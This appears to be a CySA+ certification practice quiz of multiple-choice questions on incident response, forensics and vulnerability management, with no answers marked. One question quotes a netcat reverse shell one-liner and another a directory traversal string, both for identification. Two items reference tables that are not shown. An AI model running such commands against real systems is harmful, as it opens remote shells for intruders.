CYSA 6

When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing host details, has been running for over two days. Which of the following activities will provide the best insight into this potentially malicious process, based on the anomalous behavior?. Changes to system environment variables. SMB network traffic related to the system process. Recent browser history of the primary user. Activities taken by PID 1024.

Which of the following evidence collection methods is most likely to be acceptable in court cases?. Copying all access files at the time of the incident. Creating a file-level archive of all files. Providing a full system backup inventory. Providing a bit-level image of the hard drive.

A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?. Eradication. Isolation. Reporting. Forensic analysis.

A cybersecurity analyst has been assigned to the threat-hunting team to create a dynamic detection strategy based on behavioral analysis and attack patterns. Which of the following best describes what the analyst will be creating?. Bots. IoCs. TTPs. Signatures.

Which of the following would eliminate the need for different passwords for a variety of internal applications?. CASB. SSO. PAM. MFA.

Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting the organization?. To establish what information is allowed to be released by designated employees. To designate an external public relations firm to represent the organization. To ensure that all news media outlets are informed at the same lime. To define how each employee will be contacted after an event occurs.

Which of the following would most likely be used to update a dashboard that integrates with multiple vendor tools?. Webhooks. Extensible Markup Language. Threat feed combination. JavaScript Object Notation.

An organization has a critical financial application hosted online that does not allow event logging to send to the corporate SIEM. Which of the following is the best option for the security analyst to configure to improve the efficiency of security operations?. Configure a new SIEM specific to the management of the hosted environment. Subscribe to a threat feed related to the vendor's application. Use a vendor-provided API to automate pulling the logs in real time. Download and manually import the logs outside of business hours.

After an incident, a security analyst needs to perform a forensic analysis to report complete information to a company stakeholder. Which of the following is most likely the goal of the forensic analysis in this case?. Provide a full picture of the existing risks. Notify law enforcement of the incident. Further contain the incident. Determine root cause information.

Which of the following is the most important reason for an incident response team to develop a formal incident declaration?. To require that an incident be reported through the proper channels. To identify and document staff who have the authority to decrease an incident. To allow for public disclosure of a security event impacting the organization. To establish the department that responsible for responding to an incident.

An organization has establish a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Choose two.). Ensure users the document system recovery plan prior to deployment. Perform a full system-level backup following the change. Leverage an audit tool to identify changes that are being made. Identify assets with dependence that could be impacted by the change. Require diagrams to be completed for all critical systems. Ensure that all assets are properly listed in the inventory management system.

An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason in the firewall feed stopped working?. The firewall service account was locked out. The firewall was using a paid feed. The firewall certificate expired. The firewall failed open.

A security analyst would like to integrate two different SaaS-based security toots so that one tool can notify the other in the event a threat is detected. Which of the following should the analyst utilize to best accomplish this goal?. SMB share. API endpoint. SMTP notification. SNMP trap.

An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of the evidence drive does not match the resultant hash of the imaged copy. Which of the following best describes the reason for the conflicting investigative findings?. Chain of custody was not maintained for the evidence drive. Legal authorization was not obtained prior to seizing the evidence drive. Data integrity of the imaged drive could not be verified. Evidence drive imaging was performed without a write blocker.

A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?. Hashcat. OpenVAS. OWASP ZAP. Nmap.

A security analyst detected the following suspicious activity: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity?. Network pivoting. Host scanning. Privilege escalation. Reverse shell.

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender. Which of the following information security goals is the analyst most likely trying to achieve?. Non-repudiation. Authentication. Authorization. Integrity.

Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes what the team is doing?. Simulation. Tabletop exercise. Full test. Parallel test.

Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the general public, as a best practice? (Choose two.). Law enforcement. Governance. Legal. Manager. Public relations. Human resources.

Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (Choose two.). Signal-shielded bag. Tamper-evident seal. Thumb drive. Crime scene tape. Write blocker. Drive duplicator.

During the rollout of a patch to the production environment, it was discovered that required connections to remote systems are no longer possible. Which of the following steps would have most likely revealed this gap?. Implementation. User acceptance testing. Validation. Rollback.

An organization has tracked several incidents that are listed in the following table: Which of the following is the organization’s MTTD?. 140. 150. 160. 180.

A security analyst has found a moderate-risk item in an organization’s point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?. Service-level agreement. Business process interruption. Degrading functionality. Proprietary system.

While reviewing the web server logs, a security analyst notices the following snippet: ..\../..\../boot.ini Which of the following is being attempted?. Directory traversal. Remote file inclusion. Cross-site scripting. Remote code execution. Enumeration of /etc/passwd.

Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the following CVSS v.3.1 temporal metrics was most impacted by this exposure?. Remediation level. Exploit code maturity. Report confidence. Availability.

Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operating system events?. Registry editing. Network mapping. Timeline analysis. Write blocking.

Which of the following best describes the importance of KPIs in an incident response exercise?. To identify the personal performance of each analyst. To describe how incidents were resolved. To reveal what the team needs to prioritize. To expose which tools should be used.

An organization is conducting a pilot deployment of an e-commerce application. The application’s source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software?. Static testing. Vulnerability testing. Dynamic testing. Penetration testing.

A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incident without impacting operations?. Review lessons-learned documentation and create a playbook. Gather all internal incident response party members and perform a simulation. Deploy known malware and document the remediation process. Schedule a system recovery to the DR site for a few applications.

A SOC receives several alerts indicating user accounts are connecting to the company’s identity provider through non-secure communications. User credentials for accessing sensitive, business-critical systems could be exposed. Which of the following logs should the SOC use when determining malicious intent?. DNS. tcpdump. Directory. IDS.

A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Which of the following vulnerabilities should be patched first?. Vulnerability 1. Vulnerability 2. Vulnerability 3. Vulnerability 4.

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?. Implementing credentialed scanning. Changing from a passive to an active scanning approach. Implementing a central place to manage IT assets. Performing agentless scanning.

An organization plans to use an advanced machine-learning tool as a central collection server. The tool will perform data aggregation and analysis. Which of the following should the organization implement?. SIEM. Firewalls. Syslog server. Flow analysis.

A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?. Cyber Threat Intelligence. Common Vulnerabilities and Exposures. Cyber Analytics Repository. ATT&CK.

A corporation wants to implement an agent-based endpoint solution to help: • Flag various threats • Review vulnerability feeds • Aggregate data • Provide real-time metrics by using scripting languages Which of the following tools should the corporation implement to reach this goal?. DLP. Heuristics. SOAR. NAC.

A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following should the SOC manager utilize to improve the process?. The most recent audit report. The incident response playbook. The incident response plan. The lessons-learned register.

Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-whatwhen information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes does this describe?. Business continuity plan. Lessons learned. Forensic analysis. Incident response plan.